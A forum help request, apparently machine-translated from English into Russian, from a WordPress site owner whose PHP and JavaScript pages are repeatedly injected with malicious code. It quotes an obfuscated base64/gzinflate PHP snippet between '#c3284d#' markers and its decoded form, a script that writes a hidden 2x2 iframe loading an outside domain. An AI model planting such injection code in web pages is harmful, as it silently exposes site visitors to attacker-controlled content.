За последние несколько дней мой сайт неоднократно становился объектом атаки iframe. Код добавляется в основном к страницам PHP и Javascript. Затем код кодируется PHP base 64, см. пример (. Я немного изменил код, чтобы нейтрализовать его ):
#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8 VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#
. Это расшифровано выглядит примерно так:
<script type="text/javascript">
document.write(
'<iframe src="http://opticmoxie.com/xxxxxxx.php"
name="Twitter" scrolling="auto" frameborder="no"
align="center" height="2" width="2"></iframe>'
);
Общим является то, что весь код имеет комментарий «#c3284d #», поэтому отследить вредоносный код не составляет труда. Но это требует времени...
Мы находимся на общем сервере в Gradwell (UK ), и они не особенно помогли. Итак, вопрос в том, что я могу сделать, чтобы эта проблема не повторялась? Я знаю об атаках MySQL Injection и использую PHP mysql _real _escape _для защиты от таких атак.
Сайт на PHP и MySQL диск. Мы используем MySQLFTP и имеем учетную запись оболочки для доступа по SSH. Мы используем последнее обновление Wordpress (с активированными плагинами de -).